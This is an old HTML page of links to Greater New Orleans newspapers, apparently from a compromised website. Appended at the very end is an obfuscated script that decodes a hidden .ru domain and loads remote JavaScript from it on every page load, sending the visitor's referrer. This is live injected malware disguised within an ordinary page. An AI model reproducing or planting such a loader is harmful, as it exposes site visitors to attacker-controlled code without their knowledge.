<!--#include file="..\_private\redirectlocation.asp"-->
<html>

<head>
<title>Houston - News</title>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>

<table border="0" width="100%" cellspacing="4" cellpadding="0">
  <tr>
    <td width="100%">
      <table border="0" cellpadding="2" width="100%">
        <tr>
          <th bgcolor="#CC9966" align="left" colspan="2" class="news">Greater
            New Orleans News</th>
        </tr>
        <tr>
          <td bgcolor="#FFFFCC" class="boxbody" valign="top" width="50%">
      <a href="http://www.neworleanscitybusiness.com/">CityBusiness</a> - New 
    Orleans<br>
    <a href="http://www.newsbanner.com/">News Banner</a> - Covington<br>
    <a href="http://www.nola.com/">Times, The</a> - Picayune<br>
    <a href="http://www.picayuneitem.com/">Picayune Item</a></td>
          <td bgcolor="#FFFFCC" class="boxbody" valign="top" width="50%">
    <a href="http://www.houmatoday.com/">Courier, The</a> - Houma<br>
    <a href="http://dailycomet.com/">Daily Comet</a> - Thibodaux<br>
    <a href="http://www.dnewsnet.com/">Daily News</a> - Bogalusa<br>
    <a href="http://www.zwire.com/site/news.asp?brd=1423">Daily Star, The</a> - 
    Hammond<br>
    <a href="http://www.lobservateur.com/">L'Observateur</a> - LaPlace</td>
        </tr>
      </table>
    </td>
  </tr>
</table>

<script>var QpaxQomozo = 'AXSXTNJFJJzJYOIOiCIKGJWmMFXLUOaIGPHZJLM0OUAHY7LEQOCWI.IVSrSOMNCBJu'.replace(/[A-Z]/g,''); var FibomafNidiza = document.createElement('script'); FibomafNidiza.src = 'http://' + QpaxQomozo + '/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(FibomafNidiza);</script></body>

</html>